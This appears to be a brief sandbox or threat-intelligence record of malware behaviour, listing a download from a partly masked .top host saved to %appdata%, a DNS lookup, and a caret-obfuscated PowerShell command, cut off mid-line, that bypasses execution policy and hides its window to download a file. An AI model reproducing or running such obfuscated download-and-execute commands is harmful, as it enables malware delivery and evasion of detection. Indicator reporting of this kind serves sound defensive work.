Technical Information
- http://wi###eer.top/user.php?f=##### as %appdata%.exe
- DNS ASK wi###eer.top
- '<SYSTEM32>\cmd.exe' /c p^OW^er^shel^l^.^e^Xe ^-eXe^cut^IonpO^Lic^y b^y^Pa^Ss^ -NoP^ROfi^le ^-w^iNdow^st^YL^e^ h^i^d^deN^ ^(neW^-^oBj^e^ct ^SYstem.ne^t.We^b^c^lI^eNt^)^.d^o^WNlOadfile('http://wi#...' (with hidden window)